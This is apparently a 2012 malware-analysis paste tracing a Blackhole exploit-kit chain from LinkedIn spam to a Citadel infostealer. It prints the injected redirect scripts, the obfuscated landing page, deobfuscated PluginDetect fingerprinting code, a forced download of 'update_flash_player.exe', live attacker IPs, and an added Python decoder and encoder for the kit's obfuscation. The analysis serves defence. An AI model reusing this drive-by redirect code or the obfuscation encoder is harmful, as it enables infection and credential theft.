unixfreaxjp

BHEK2 w/ e,f PluginDetect Param, Drop Trojan/Stealer/DLoader

Oct 17th, 2012
===========================================
#MalwareMustDie!!!!!!!!!!
INFECTION OF CITADEL WITH BHEK
BHEK IS USING PARAMETER e & f
Exploit Method: AcroPDF.PDF
Payload download Method: Msxml2.XMLHTTP
Payload : Citadel/Trojan Password/InfoStealer
VT: https://www.virustotal.com/file/7fc40b6b0ec44852da2017dc3aa37de88ed9c2f6a2d0d41d33652990b907de22/analysis/1350446004/
===========
Only VT 6/43 !!!!
==========
DrWeb : Trojan.PWS.Stealer.946
Norman : W32/Krypt.GB
McAfee-GW-Edition : PWS-Zbot.gen.aln
McAfee : PWS-Zbot.gen.aln
Fortinet : W32/Kryptik.WDV!tr
Panda : Suspicious file
Summary:
This trojan sends data from the infected PC over encrypted HTTP
communication to 108.178.59.34 (see the network connection report below)
and also downloads other malware:
* GET /Z2U.exe HTTP/1.0 Host: 3073.a.hostable.me
* GET /PNV3Hbi.exe HTTP/1.0 Host: 85.18.21.252
----------------------------
Set of infected files:
----------------------------
assure_numb_engineers.php 0f4f3526dd2bad681586a90fc579f6e2
index.html.2 ad967ba32c54c59db0f4a947410d96f2
js.js d20a786ec45f68eb56f15a589c566b27
js.js.1 d20a786ec45f68eb56f15a589c566b27
js.js.2 d20a786ec45f68eb56f15a589c566b27
LinkEdIn-Spam.eml d8c4d95479f7a1264457a8d1b5e5f457
update_flash_player.exe bb53221e4220466c876dbfad9cede066
PoC Pic: https://lh3.googleusercontent.com/-XdS_YZJvyKk/UH46i1qRPUI/AAAAAAAAGQk/H9mKzI08TLc/s541/004.jpg

===========================================
FULL ANALYSIS / #MalwareMustDie / @unixfreaxjp
===========================================

// LinkedIn spam;
http://pastebin.com/raw.php?i=n7rppRJY
#Hint from @Xylit0l < Merci!!!!!!!!

// infected URL detected:
...Privately</span></a></div></td></tr></table>
(LINE 170): <a href="http://www.nikecup.net/MSmxYk/index.html" style="color:#006699;
font-family:Arial,sans-serif;font-size:12px;text-decoration:none">Chase Mathis</a>
---------------------------------------
// download PoC
--12:24:18-- http://www.nikecup.net/MSmxYk/index.html
=> `index.html.2'
Resolving www.nikecup.net... 62.149.131.163
Connecting to www.nikecup.net|62.149.131.163|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 422 [text/html]
12:24:18 (15.01 MB/s) - `index.html.2' saved [422/422]


--------------------------------
// cat the mess
<html>
<table width="275" border="1" cellpadding="3" bordercolor="#0000FF"><tr><td><div align="center">Connecting to server...</div></td></tr></table></a>
<script type="text/javascript" src="http://alpuyecamorelos.com/dycYbDyw/js.js"></script>
<script type="text/javascript" src="http://videorender.com.ar/kSWEngwv/js.js"></script>
<script type="text/javascript" src="http://jbrnh.com/3ZKtSw8d/js.js"></script>

</html>

----------------------------------
// fetch the js.js, noted: referer


--user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
--referer="http://www.nikecup.net/MSmxYk/index.html"
--target="http://jbrnh.com/3ZKtSw8d/js.js"


--12:30:38-- http://alpuyecamorelos.com/dycYbDyw/js.js
=> `js.js'
Resolving alpuyecamorelos.com... 209.62.88.194
Connecting to alpuyecamorelos.com|209.62.88.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]
12:30:38 (2.29 MB/s) - `js.js' saved [73/73]


--12:31:06-- http://videorender.com.ar/kSWEngwv/js.js
=> `js.js.1'
Resolving videorender.com.ar... 174.37.144.224
Connecting to videorender.com.ar|174.37.144.224|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]
12:31:07 (2.49 MB/s) - `js.js.1' saved [73/73]


--12:31:26-- http://jbrnh.com/3ZKtSw8d/js.js
=> `js.js.2'
Resolving jbrnh.com... 184.168.101.248
Connecting to jbrnh.com|184.168.101.248|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/x-javascript]
12:31:27 (2.33 MB/s) - `js.js.2' saved [73/73]

// all three have the same contents ↑

-----------------------------
// cat the mess (js.js)

document.location='http://108.178.59.34/links/assure_numb_engineers.php';

----------------------------
// fetch the mess, noted: referer, user agent

--user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
--referer="http://www.nikecup.net/MSmxYk/index.html"
--target="http://108.178.59.34/links/assure_numb_engineers.php"

--12:32:46-- http://108.178.59.34/links/assure_numb_engineers.php
=> `assure_numb_engineers.php'
Connecting to 108.178.59.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
12:32:47 (65.45 KB/s) - `assure_numb_engineers.php' saved [27474]

----------------------------
// Voila.. PluginDetect.. inside an obfuscated blob..

<html><head><title></title></head><body><div dqa="asd"></div><scri
0-9a-z]/g,k);};g="getEleme";p=parseInt;cc="co";ss=String.fromCharC
nction asd(){e=window["eval"];e(s);}ddd="ad".substr(1);sss="sub"+"
(i);};g+="ntB"+"yId";</script><u id="google" 45="1b43391a(1b454545
c%3r3k393p1s)31331e3o3r#3k2r2g3c3r*3k393p1s3c!3r3k393q3f^3l3k1a371
@2g3l373a3b&3a213q3o3r+3b1t371g39%373i3i253o)3o37411a37#1g2r2g3c3r
37411a371g$2r2g3c3r3k(393p1b1t3f@3c1a371g3l&3k283" 37="383i3b3a18_
p3q373q3r&3p211f1k1t+3o3b3q3r3o%3k12374537)1g3p3q373q#3r3p211j1t*3
3c3r3k39$3q3f3l3k1a(381e371b43@3s373o1239&213q3e3f3p+1t3f3c1a39%1g
f3p2a3r!3k391a381b^44441a391g_3f3p253o3o$37411a381b(181" 40="s*1i1
3b433f$3c1a381g3f(3p2a3r3k39@1a391b1b43&391a381b45+45451e3d3b%3q2q
s141e!141e16163d^3b3q2q3b3o_3p3f3l3k1s$3c3r3k393q(3f3l3k1a37@1b433
:
:
3o141e142n@393o3f3m3q&3f3k3d1g28+3f393q
13216331h%1e39213q3e)3f3p1t3c3l#3o1a371
1g3p3i3f@393b1a1k1b&1t3f3c1a3d+1g3i3b3k
a3b3i3b_3q3b123c31$3733454539(373q393e1
21)1a3g1g3d3b#3q293i3b3j*3b3k3q3p26!412
f&3c1a3d1b43+3f3c1a3d1g%3c3f3o3p3q)273e
$3l3o3b1b1b(433d1g3f3k@3p3b3o3q26&3b3c3
>
if(020==0x10)d=document;
try{(d+"523")()}catch(dsgdsg){a=d[g](gg
s="";
for(i=0;;i++){
window.asd2();
if(r){s=s+r;}else break;
}
a=s;
s="";
k="";
asd3();
qa=0x1e;
for(i=0;i<a.length;i+=2){
s+=ss(p(a[sss](i,2),qa));
}
asd();
</script></body></html>


--------------------------------------------------------
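The decoder loop at the end of the blob above (`s+=ss(p(a[sss](i,2),qa))` with `qa=0x1e`, `p=parseInt`, `ss=String.fromCharCode` and `sss="substr"`, after the `replace(/[^0-9a-z]/g,k)` strip with `k=""`) reads the attribute text two characters at a time, parses each pair as a base-30 number and turns it into a character. The Python below is an added example for this write-up, not code from the paste or from the kit: it re-implements that step offline so the attribute text can be decoded without ever running the script, and checks itself against one attribute line copied from the blob. The order in which the kit concatenates the numbered attributes is not recoverable from the truncated blob, so the example decodes one line only; the junk-character alphabet in the constructed encoder is an assumption modelled on what the attribute text shows.

```python
"""Offline decoder for the base-30 pair encoding seen in the PluginDetect
landing page above (added example, not part of the original paste)."""
import re
from typing import Optional

RADIX = 0x1e                                 # qa=0x1e in the landing-page script
DIGITS = "0123456789abcdefghijklmnopqrst"    # the 30 digits parseInt(x, 30) accepts
STRIP = re.compile(r"[^0-9a-z]")             # the replace(/[^0-9a-z]/g, "") seen in the blob

# One attribute line copied verbatim from the <u id="google"> element above.
PAGE_LINE = "3b433f$3c1a381g3f(3p2a3r3k39@1a391b1b43&391a381b45+45451e3d3b%3q2q"


def parse_int_radix(chunk: str, radix: int = RADIX) -> Optional[int]:
    """Emulate JavaScript parseInt(chunk, radix): consume leading valid digits,
    stop at the first invalid one, None (NaN) if nothing was parsed."""
    value, seen = 0, False
    for ch in chunk:
        d = DIGITS.find(ch)
        if d < 0 or d >= radix:
            break
        value, seen = value * radix + d, True
    return value if seen else None


def decode_blob(blob: str) -> str:
    """Mirror of the in-page loop: strip junk, take substr(i, 2) chunks,
    parseInt(chunk, 30), String.fromCharCode. fromCharCode(NaN) yields NUL."""
    cleaned = STRIP.sub("", blob)
    out = []
    for i in range(0, len(cleaned), 2):
        code = parse_int_radix(cleaned[i:i + 2])
        out.append(chr(code) if code is not None else "\x00")
    return "".join(out)


def encode_base30(text: str, junk: str = "$%^&*()@!+_#") -> str:
    """Constructed encoder so the example round-trips: two base-30 digits per
    character, with a junk character inserted after every third pair. The junk
    alphabet is an assumption; any character outside [0-9a-z] would do."""
    pieces = []
    for n, ch in enumerate(text):
        code = ord(ch)
        if code >= RADIX * RADIX:
            raise ValueError("character does not fit in two base-30 digits")
        pieces.append(DIGITS[code // RADIX] + DIGITS[code % RADIX])
        if n % 3 == 2:
            pieces.append(junk[n % len(junk)])
    return "".join(pieces)


if __name__ == "__main__":
    print(decode_blob(PAGE_LINE))
    sample = encode_base30("if (b.isFunc(c)){ c(b) }")
    print(sample, "->", decode_blob(sample))
```

Decoding the copied line gives `e{if(b.isFunc(c)){c(b)}}},getV`, which lines up with the `call` / `getVersionDelimiter` region of the deobfuscated PluginDetect source below; that is a cheap way to confirm a decoder before trusting it on the whole blob.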

// deobfuscate the code


try {
var PluginDetect = {
version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){
return function (){
c(b, a)
}
}
, isDefined : function (b){
return typeof b != "undefined"
}
, isArray : function (b){
return (/array/i).test(Object.prototype.toString.call(b))
}
, isFunc : function (b){
return typeof b == "function"
}
, isString : function (b){
return typeof b == "string"
}
, isNum : function (b){
return typeof b == "number"
}
, isStrNum : function (b){
return (typeof b == "string" && (/\d/).test(b))
}
, getNumRegx : /[\d][\d\.\_,-]*/, splitNumRegx : /[\.\_,-]/g,
getNum : function (b, c){
var d = this , a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).
exec(b) : null;
return a ? a[0] : null
}
, compareNums : function (h, f, d){
var e = this , c, b, a, g = parseInt;
if (e.isStrNum(h) && e.isStrNum(f)){
if (e.isDefined(d) && d.compareNums){
return d.compareNums(h, f)
}
c = h.split(e.splitNumRegx);
b = f.split(e.splitNumRegx);
for (a = 0; a < Math.min(c.length, b.length);
a ++ ){
if (g(c[a], 10) > g(b[a], 10)){
return 1
}
if (g(c[a], 10) < g(b[a], 10)){
return -1
}
}
}
return 0
}
, formatNum : function (b, c){
var d = this , a, e;
if (!d.isStrNum(b)){
return null
}
if (!d.isNum(c)){
c = 4
}
c--;
e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
for (a = 0; a < 4; a ++ ){
if (/^(0+)(.+)$/.test(e[a])){
e[a] = RegExp.$2
}
if (a > c ||! (/\d/).test(e[a])){
e[a] = "0"
}
}
return e.slice(0, 4).join(",")
}
, $$hasMimeType : function (a){
return function (c){
if (!a.isIE && c){
var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
for (b = 0; b < d.length; b ++ ){
if (a.isString(d[b]) && (/[^\s]/).test(d[b])){
f = navigator.mimeTypes[d[b]];
e = f ? f.enabledPlugin : 0;
if (e && (e.name || e.description)){
return f
}
}
}
}
return null
}
}
, findNavPlugin : function (l, e, c){
var j = this , h = new RegExp(l, "i"), d = (!j.isDefined(e) || e) ? /\d/ : 0, k = c ?
new RegExp(c, "i") : 0, a = navigator.plugins, g = "", f, b, m;
for (f = 0; f < a.length; f ++ ){
m = a[f].description || g;
b = a[f].name || g;
if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.
test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){
if (!k ||! (k.test(m) || k.test(b))){
return a[f]
}
}
}
return null
}
, getMimeEnabledPlugin : function (k, m, c){
var e = this , f, b = new RegExp(m, "i"), h = "", g = c ? new RegExp(c, "i") : 0, a,
l, d, j = e.isString(k) ? [k] : k;
for (d = 0; d < j.length; d ++ ){
if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)){
l = f.description || h;
a = f.name || h;
if (b.test(l) || b.test(a)){
if (!g ||! (g.test(l) || g.test(a))){
return f
}
}
}
}
return 0
}
, getPluginFileVersion : function (f, b){
var h = this , e, d, g, a, c = -1;
if (h.OS > 2 ||! f ||! f.version ||! (e = h.getNum(f.version))){
return b
}
if (!b){
return e
}
e = h.formatNum(e);
b = h.formatNum(b);
d = b.split(h.splitNumRegx);
g = e.split(h.splitNumRegx);
for (a = 0; a < d.length; a ++ ){
if (c > -1 && a > c && d[a] != "0"){
return b
}
if (g[a] != d[a]){
if (c == -1){
c = a
}
if (d[a] != "0"){
return b
}
}
}
return e
}
, AXO : window.ActiveXObject, getAXO : function (a){
var f = null, d, b = this , c = {
}
;
try {
f = new b.AXO(a)
}
catch (d){
}
return f
}
, convertFuncs : function (f){
var a, g, d, b = /^[\$][\$]/, c = this ;
for (a in f){
if (b.test(a)){
try {
g = a.slice(2);
if (g.length > 0 &&! f[g]){
f[g] = f[a](f);
delete f[a]
}
}
catch (d){
}
}
}
}
, initObj : function (e, b, d){
var a, c;
if (e){
if (e[b[0]] == 1 || d){
for (a = 0; a < b.length; a = a + 2){
e[b[a]] = b[a + 1]
}
}
for (a in e){
c = e[a];
if (c && c[b[0]] == 1){
this .initObj(c, b)
}
}
}
}
, initScript : function (){
var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "",
b = a.platform || "", h = a.product || "";
c.initObj(c, ["$", c]);
for (f in c.Plugins){
if (c.Plugins[f]){
c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
}
}
;
c.OS = 100;
if (b){
var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod",
21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, ""
, 100];
for (f = d.length - 2; f >= 0; f = f - 2){
if (d[f] && new RegExp(d[f], "i").test(b)){
c.OS = d[f + 1];
break
}
}
}
c.convertFuncs(c);
c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName(
"body")[0] || document.body || null);
c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) :
null ;
c.ActiveXEnabled = false;
if (c.isIE){
var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
"ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
"Scripting.Dictionary", "wmplayer.ocx"];
for (f = 0; f < j.length; f ++ ){
if (c.getAXO(j[f])){
c.ActiveXEnabled = true;
break
}
}
}
c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 :
"0.9") : null;
c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && (
/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(
RegExp.$1) : null;
c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ?
parseFloat(RegExp.$1, 10) : null;
c.addWinEvent("load", c.handler(c.runWLfuncs, c))
}
, init : function (d){
var c = this , b, d, a = {
status : -3, plugin : 0
}
;
if (!c.isString(d)){
return a
}
if (d.length == 1){
c.getVersionDelimiter = d;
return a
}
d = d.toLowerCase().replace(/\s/g, "");
b = c.Plugins[d];
if (!b ||! b.getVersion){
return a
}
a.plugin = b;
if (!c.isDefined(b.installed)){
b.installed = null;
b.version = null;
b.version0 = null;
b.getVersionDone = null;
b.pluginName = d
}
c.garbage = false;
if (c.isIE &&! c.ActiveXEnabled && d !== "java"){
a.status = -2;
return a
}
a.status = 1;
return a
}
, fPush : function (b, a){
var c = this ;
if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0
])))){
a.push(b)
}
}
, callArray : function (b){
var c = this , a;
if (c.isArray(b)){
for (a = 0; a < b.length; a ++ ){
if (b[a] === null){
return
}
c.call(b[a]);
b[a] = null
}
}
}
, call : function (c){
var b = this , a = b.isArray(c) ? c.length : -1;
if (a > 0 && b.isFunc(c[0])){
c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
}
else {
if (b.isFunc(c)){
c(b)
}
}
}
, getVersionDelimiter : ",", $$getVersion : function (a){
return function (g, d, c){
var e = a.init(g), f, b, h = {
}
;
if (e.status < 0){
return null
}
;
f = e.plugin;
if (f.getVersionDone != 1){
f.getVersion(null, d, c);
if (f.getVersionDone === null){
f.getVersionDone = 1
}
}
a.cleanup();
b = (f.version || f.version0);
b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
return b
}
}
, cleanup : function (){
}
, addWinEvent : function (d, c){
var e = this , a = window, b;
if (e.isFunc(c)){
if (a.addEventListener){
a.addEventListener(d, c, false)
}
else {
if (a.attachEvent){
a.attachEvent("on" + d, c)
}
else {
b = a["on" + d];
a["on" + d] = e.winHandler(c, b)
}
}
}
}
, winHandler : function (d, c){
return function (){
d();
if (typeof c == "function"){
c()
}
}
}
, WLfuncs0 : [], WLfuncs : [], runWLfuncs : function (a){
var b = {
}
;
a.winLoaded = true;
a.callArray(a.WLfuncs0);
a.callArray(a.WLfuncs);
if (a.onDoneEmptyDiv){
a.onDoneEmptyDiv()
}
}
, winLoaded : false, $$onWindowLoaded : function (a){
return function (b){
if (a.winLoaded){
a.call(b)
}
else {
a.fPush(b, a.WLfuncs)
}
}
}
, div : null, divID : "plugindetect", divWidth : 50, pluginSize : 1, emptyDiv :
function (){
var d = this , b, h, c, a, f, g;
if (d.div && d.div.childNodes){
for (b = d.div.childNodes.length - 1; b >= 0; b -- ){
c = d.div.childNodes[b];
if (c && c.childNodes){
for (h = c.childNodes.length - 1; h >= 0; h -- ){
g = c.childNodes[h];
try {
c.removeChild(g)
}
catch (f){
}
}
}
if (c){
try {
d.div.removeChild(c)
}
catch (f){
}
}
}
}
if (!d.div){
a = document.getElementById(d.divID);
if (a){
d.div = a
}
}
if (d.div && d.div.parentNode){
try {
d.div.parentNode.removeChild(d.div)
}
catch (f){
}
d.div = null
}
}
, DONEfuncs : [], onDoneEmptyDiv : function (){
var c = this , a, b;
if (!c.winLoaded){
return
}
if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null){
return
}
for (a in c){
b = c[a];
if (b && b.funcs){
if (b.OTF == 3){
return
}
if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null){
return
}
}
}
for (a = 0; a < c.DONEfuncs.length; a ++ ){
c.callArray(c.DONEfuncs)
}
c.emptyDiv()
}
, getWidth : function (c){
if (c){
var a = c.scrollWidth || c.offsetWidth, b = this ;
if (b.isNum(a)){
return a
}
}
return -1
}
, getTagStatus : function (m, g, a, b){
var c = this , f, k = m.span, l = c.getWidth(k), h = a.span, j = c.getWidth(h), d =
g.span, i = c.getWidth(d);
if (!k ||! h ||! d ||! c.getDOMobj(m)){
return -2
}
if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1){
return 0
}
if (l >= i){
return -1
}
try {
if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)){
if (!m.winLoaded && c.winLoaded){
return 1
}
if (m.winLoaded && c.isNum(b)){
if (!c.isNum(m.count)){
m.count = b
}
if (b - m.count >= 10){
return 1
}
}
}
}
catch (f){
}
return 0
}
, getDOMobj : function (g, a){
var f, d = this , c = g ? g.span : 0, b = c && c.firstChild ? 1 : 0;
try {
if (b && a){
d.div.focus()
}
}
catch (f){
}
return b ? c.firstChild : null
}
, setStyle : function (b, g){
var f = b.style, a, d, c = this ;
if (f && g){
for (a = 0; a < g.length; a = a + 2){
try {
f[g[a]] = g[a + 1]
}
catch (d){
}
}
}
}
, insertDivInBody : function (a, i){
var h, f = this , b = "pd33993399", d = null, j = i ? window.top.document : window.
document, c = "<", g = (j.getElementsByTagName("body")[0] || j.body);
if (!g){
try {
j.write(c + 'div id="' + b + '">o' + c + "/div>");
d = j.getElementById(b)
}
catch (h){
}
}
g = (j.getElementsByTagName("body")[0] || j.body);
if (g){
if (g.firstChild && f.isDefined(g.insertBefore)){
g.insertBefore(a, g.firstChild)
}
else {
g.appendChild(a)
}
if (d){
g.removeChild(d)
}
}
else {
}
}
, insertHTML : function (g, b, h, a, l){
var m, n = document, k = this , q, p = n.createElement("span"), o, j, f = "<";
var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin",
"0px", "visibility", "visible"];
var i =
"outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
if (!k.isDefined(a)){
a = ""
}
if (k.isString(g) && (/[^\s]/).test(g)){
g = g.toLowerCase().replace(/\s/g, "");
q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
q += 'style="' + i + 'display:inline;" ';
for (o = 0; o < b.length; o = o + 2){
if (/[^\s]/.test(b[o + 1])){
q += b[o] + '="' + b[o + 1] + '" '
}
}
q += ">";
for (o = 0; o < h.length; o = o + 2){
if (/[^\s]/.test(h[o + 1])){
q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
}
}
q += a + f + "/" + g + ">"
}
else {
q = a
}
if (!k.div){
j = n.getElementById(k.divID);
if (j){
k.div = j
}
else {
k.div = n.createElement("div");
k.div.id = k.divID
}
k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize +
3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3)
+ "px", "verticalAlign", "baseline", "display", "block"]));
if (!j){
k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
k.insertDivInBody(k.div)
}
}
if (k.div && k.div.parentNode){
k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.
pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
try {
p.innerHTML = q
}
catch (m){
}
;
try {
k.div.appendChild(p)
}
catch (m){
}
;
return {
span : p, winLoaded : k.winLoaded, tagName : g, outerHTML : q
}
}
return {
span : null, winLoaded : k.winLoaded, tagName : "", outerHTML : q
}
}
, Plugins : {
adobereader : {
mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
"PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
{
}
, pluginHasMimeType : function (d, c, f){
var b = this , e = b.$, a;
for (a in d){
if (d[a] && d[a].type && d[a].type == c){
return 1
}
}
if (e.getMimeEnabledPlugin(c, f)){
return 1
}
return 0
}
, getVersion : function (l, j){
var g = this , d = g.$, i, f, m, n, b = null, h = null, k = g.mimeType, a, c;
if (d.isString(j)){
j = j.replace(/\s/g, "");
if (j){
k = j
}
}
else {
j = null
}
if (d.isDefined(g.INSTALLED[k])){
g.installed = g.INSTALLED[k];
return
}
if (!d.isIE){
a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
if (g.getVersionDone !== 0){
g.getVersionDone = 0;
b = d.getMimeEnabledPlugin(g.mimeType, a);
if (!j){
n = b
}
if (!b && d.hasMimeType(g.mimeType)){
b = d.findNavPlugin(a, 0)
}
if (b){
g.navPluginObj = b;
h = d.getNum(b.description) || d.getNum(b.name);
h = d.getPluginFileVersion(b, h);
if (!h && d.OS == 1){
if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)){
h = "9"
}
else {
if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)){
h = "8"
}
}
}
}
}
else {
h = g.version
}
if (!d.isDefined(n)){
n = d.getMimeEnabledPlugin(k, a)
}
g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ? -0.2 : -1))
}
else {
b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
c = /=\s*([\d\.]+)/g;
try {
f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src",
""], "", g))).GetVersions();
for (m = 0; m < 5; m ++ ){
if (c.test(f) && (!h || RegExp.$1 > h)){
h = RegExp.$1
}
}
}
catch (i){
}
g.installed = h ? 1 : (b ? 0 : -1)
}
if (!g.version){
g.version = d.formatNum(h)
}
g.INSTALLED[k] = g.installed
}
}
, zz : 0
}
}
;
PluginDetect.initScript();
PluginDetect.getVersion(".");
pdfver = PluginDetect.getVersion("AdobeReader");
}
catch (e){
}
if (typeof pdfver == 'string'){
pdfver = pdfver.split('.')
}
else {
pdfver = [0, 0, 0, 0]
}
function x(s){
d = [];
for (i = 0; i < s.length; i ++ ){
k = (s.charCodeAt(i) - 46).toString(16);
if (k.length == 1)k = "0" + k;
d.push(k);
}
;
return d.join("");
}
end_redirect = function (){
window.location.href = 'http://108.178.59.34/adobe/update_flash_player.exe';
}
;
window.onbeforeunload = function (){
return "";
}
;
document.write('');
setTimeout(end_redirect, 60000);


------------------------------------
// infection analysis per exploit & PluginDetect hint..
===================
EXPLOITED BY:
===================
// , Plugins : {
// adobereader : {
// mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
// "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :

===================
DOWNLOADED VIA:
===================
// var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
// "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
// "Scripting.Dictionary", "wmplayer.ocx"];
// for (f = 0; f < j.length; f ++ ){
// if (c.getAXO(j[f])){
// c.ActiveXEnabled = true;
// break

*********** Please note the parameters: var f, j *****************

===================
TO URL:
===================
// end_redirect = function (){
// window.location.href = 'http://108.178.59.34/adobe/update_flash_player.exe';}
//

--------------download PoC------------------------------------------------

--user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
--referer="http://108.178.59.34/links/assure_numb_engineers.php"
--target="http://108.178.59.34/adobe/update_flash_player.exe"

--12:40:16-- http://108.178.59.34/adobe/update_flash_player.exe
=> `update_flash_player.exe'
Connecting to 108.178.59.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 150,616 (147K) [application/octet-stream]
12:40:18 (139.15 KB/s) - `update_flash_player.exe' saved [150616/150616] <==== CITADEL PAYLOAD


---------------INFECTION CROSS REFERENCE AUTOMATION------------------
[2012-10-17 12:42:46] [MongoDB] MongoDB instance not available
[2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Status: 200, Referrer: None)
[2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Content-type: text/html, MD5: ad967ba32c54c59db0f4a947410d96f2)
[2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
[2012-10-17 12:42:52] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
[2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
[2012-10-17 12:43:04] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:43:04] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:04] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
[2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Content-type: application/x-javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
[2012-10-17 12:43:41] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:43:42] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
